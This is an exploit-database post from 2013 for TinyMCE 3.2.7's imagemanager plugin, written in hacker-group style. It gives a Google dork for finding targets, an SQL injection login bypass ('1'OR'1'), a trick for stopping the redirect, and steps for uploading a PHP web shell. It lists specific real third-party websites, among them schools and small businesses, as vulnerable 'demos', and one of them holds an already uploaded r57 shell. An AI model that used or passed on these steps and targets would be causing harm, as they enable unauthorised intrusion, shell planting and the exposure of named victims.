TinyMCE 3.2.7 SQL Injection / Shell Upload

2013-11-05T00:00:00
ID PACKETSTORM:123910
Type packetstorm
Reporter KedAns-Dz
Modified 2013-11-05T00:00:00

Description

                                        
                                            `  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
> Title : TinyMCE v3.2.x <= (AuthBypass/ShellUpload) Multiple Vulnerabilites  
  
> Author : KedAns-Dz  
+ E-mail : ked-h (@hotmail.com / @1337day.com)  
+ FaCeb0ok : fb.me/Inj3ct0rK3d  
+ TwiTter : @kedans  
  
# Platform : PHP / WebApp  
+ Cat/Tag : Shell / File Upload , Auth Bypassing , Multiple  
  
*************************************************************************/  
  
# TinyMCE v3.2.7 or ..X is suffer from Multiple vuln's / bug :p  
# Remote Attacker can bypassin auth and upload files , shell's etc...  
# 1st try with this dork :  
google dork : allinurl:/plugins/imagemanager/pages/im/index.html  
  
# (1) how to bypass auth? =>  
you can bypass auth by simple poc of bypassing like  
site.tld/jscripts/tiny_mce/plugins/imagemanager/login_session_auth.php  
user & pass : '1'OR'1'  
=+ demo's :  
http://www.prodigy-school.ru/jscripts/tiny_mce/plugins/imagemanager/login_session_auth.php  
user : '1'OR'1'  
pass : '1'OR'1'  
http://www.erez-komarovsky.co.il/admin/login.php  
user: 1' OR '1'='1  
pass: 1' OR '1'='1  
  
&& or ( if the simple poc d'nt workin after u access :   
site.tld/js/tiny_mce-3.2.7/plugins/imagemanager/pages/im/index.html )  
clic rapidly of the button stop in browser for stop the redirction ;)   
  
# (2) Upload Shell/Files .. (.txt .gif) or (.php by use temperData or http header :D ) =>  
  
poc : site.tld/[path]/plugins/imagemanager/pages/im/index.html  
and clic in ( upload / add / [+] ) button & upload what you need ;)  
for ex:   
shell after up : http://www.prodigy-school.ru/data/r57.txt  
  
=+ Demo's:  
  
http://www.allemandemusic.com.hostbaby.com/dashboard/js/tiny_mce-3.2.7/plugins/imagemanager/pages/im/index.html  
http://gesundheit-gt.de/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html  
http://www.yorkshiredales-stay.co.uk/maintain/tiny_mce/plugins/imagemanager/pages/im/index.html  
http://www.erez-komarovsky.co.il/admin/include/tinymce/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html  
http://freewb.hu/freewbr/tinymce/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html  
http://volunteermckinney.galaxydigital.com/includes/tiny_mce/plugins/imagemanager/pages/im/index.html  
http://www.eastpennsd.org/progfiles/tinymce3JQ/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.htm  
http://209.18.48.74/progfiles/tinymce3JQ/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html  
  
# Take care kid's & 1337day Fan's :D   
# Ked is Back ^_^ <3  
  
####  
#<! THE END ^_* ! , Good Luck all <3 | 1337-DAY Aint DIE ^_^ !>  
#<+ Proof Of Concept & Exploit Hunted by : Khaled [KedAns-Dz] +>  
#<+ Copyright © 2013 Inj3ct0r Team | 1337day Exploit Database.+>  
# ** Greetings : < Dz Offenders Cr3w [&] Algerian Cyber Army > *  
# ** ! Hassi Messaoud <3 1850 Hood <3 , Dedicate fr0m Algeria **  
####  
  
# 1337day.com id:[ 1337day-2013-21454 ]  
`